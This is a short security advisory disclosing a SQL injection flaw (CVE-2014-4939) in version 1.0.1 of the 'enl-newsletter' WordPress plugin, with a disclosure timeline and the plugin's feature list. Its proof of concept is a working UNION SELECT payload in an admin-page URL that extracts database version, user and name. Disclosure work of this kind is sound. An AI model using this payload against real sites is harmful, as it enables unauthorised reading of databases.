wp-plugin : enl-newsletter

Plugin Details
Plugin Name: wp-plugin : enl-newsletter
Effected Version : 1.0.1 (and most probably lower version's if any)
Vulnerability : Injection
Identified by : anantshri
WPScan Reference URL

Technical Details
Minimum Level of Access Required : Administrator
PoC - (Proof of Concept) :

<http://localhost/wp-admin/admin.php?page=enl-add-new&id=2 union select 1,@@version,3,user(),database(),6,7,8,9,0,1>

Disclosure Timeline
Vendor Contacted : 2013-12-28
Plugin Status : Updated on
Public Disclosure : May 28, 2014
CVE Number : CVE-2014-4939
Plugin Description :
[| **Main Features:** 1. Setup multiple newsletters according to the post categories. 2. Different send modes include manual, weekly and monthly. 3. Custom newsletter content, template and post count. 4. Newsletter signup widget for user registration. 5. Subscriber info list containing email, ip and registeration time. 6. Import wordpress users to subscriber list. **More info:** * [Leave a comment](http://www.wp-coder.net/enl-newsletter/) ]